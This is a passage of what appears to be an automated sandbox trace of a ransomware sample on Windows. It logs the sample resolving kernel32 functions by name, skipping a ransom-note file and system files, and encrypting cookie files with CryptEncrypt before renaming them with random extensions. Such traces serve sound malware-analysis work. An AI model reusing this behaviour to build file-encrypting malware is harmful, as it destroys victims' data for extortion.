returned="DosPathToSessionPathA" [0181.702] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.702] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.702] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.702] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.702] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.703] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.703] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.703] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.703] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.703] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.703] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.703] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.703] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.703] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.703] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.703] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.703] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.703] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.703] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.703] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.704] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.704] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ") returned 123 [0181.704] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ.NZRVB2") returned 130 [0181.704] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6ighlz"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ.NZRVB2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6ighlz.nzrvb2"), dwFlags=0x0) returned 1 [0181.706] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.706] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.706] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.707] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61093ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61093ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xab847fc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x35e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", cAlternateFileName="5P5NRG~1.JKI")) returned 1 [0181.707] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", lpString2="DECRYPT-FILES.txt") returned -1 [0181.707] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", lpString2="autorun.inf") returned -1 [0181.707] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", lpString2="boot.ini") returned -1 [0181.707] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", lpString2="desktop.ini") returned -1 [0181.707] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", lpString2="ntuser.dat") returned -1 [0181.707] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", lpString2="iconcache.db") returned -1 [0181.707] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", lpString2="bootsect.bak") returned -1 [0181.707] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", lpString2="ntuser.dat.log") returned -1 [0181.707] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", lpString2="thumbs.db") returned -1 [0181.707] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw", lpString2="Bootfont.bin") returned -1 [0181.707] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw") returned 39 [0181.707] lstrcmpiW (lpString1="jKIw", lpString2="lnk") returned -1 [0181.707] lstrcmpiW (lpString1="jKIw", lpString2="exe") returned 1 [0181.707] lstrcmpiW (lpString1="jKIw", lpString2="sys") returned -1 [0181.707] lstrcmpiW (lpString1="jKIw", lpString2="dll") returned 1 [0181.707] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.707] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw") returned 39 [0181.709] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.709] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@google[1].txt.jKIw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.jKIw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.jKIw" [0181.709] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.jKIw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt.jkiw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.710] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=862) returned 1 [0181.710] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.710] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.711] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.711] CloseHandle (hObject=0x288) returned 1 [0181.711] CloseHandle (hObject=0x284) returned 1 [0181.711] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.711] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x610b9d00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61282d80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xab894280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", cAlternateFileName="5P5NRG~1.ZQZ")) returned 1 [0181.711] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", lpString2="DECRYPT-FILES.txt") returned -1 [0181.711] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", lpString2="autorun.inf") returned -1 [0181.711] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", lpString2="boot.ini") returned -1 [0181.711] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", lpString2="desktop.ini") returned -1 [0181.711] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", lpString2="ntuser.dat") returned -1 [0181.711] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", lpString2="iconcache.db") returned -1 [0181.711] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", lpString2="bootsect.bak") returned -1 [0181.711] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", lpString2="ntuser.dat.log") returned -1 [0181.711] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", lpString2="thumbs.db") returned -1 [0181.711] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA", lpString2="Bootfont.bin") returned -1 [0181.711] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA") returned 40 [0181.711] lstrcmpiW (lpString1="zqzHA", lpString2="lnk") returned 1 [0181.712] lstrcmpiW (lpString1="zqzHA", lpString2="exe") returned 1 [0181.712] lstrcmpiW (lpString1="zqzHA", lpString2="sys") returned 1 [0181.712] lstrcmpiW (lpString1="zqzHA", lpString2="dll") returned 1 [0181.712] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.712] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA") returned 40 [0181.712] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.712] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA" [0181.712] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzha"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.712] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=460) returned 1 [0181.712] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.712] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.713] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.713] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.713] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.713] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.714] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.714] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.714] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.714] CloseHandle (hObject=0x288) returned 1 [0181.714] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.715] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.715] CloseHandle (hObject=0x0) returned 0 [0181.715] CloseHandle (hObject=0x284) returned 1 [0181.716] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.716] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.716] GetTickCount () returned 0x1134d17 [0181.716] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.716] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.716] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.716] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.717] lstrlenA (lpString="kernel32.dll") returned 12 [0181.717] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.717] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.717] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.717] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.721] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.721] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.721] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.721] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.721] lstrlenA (lpString="ADDATOMA") returned 8 [0181.721] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.721] lstrlenA (lpString="ADDATOMW") returned 8 [0181.721] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.721] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.721] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.721] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.721] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.721] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.721] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.721] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.722] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.722] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.722] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.722] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.722] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.722] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.722] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.722] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.722] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.722] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.722] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.722] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.722] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.722] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.722] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.722] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.722] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.722] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.722] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.723] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.723] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.723] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.723] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.723] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.723] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.723] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.723] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.723] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.723] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.723] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.723] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.723] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.723] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, 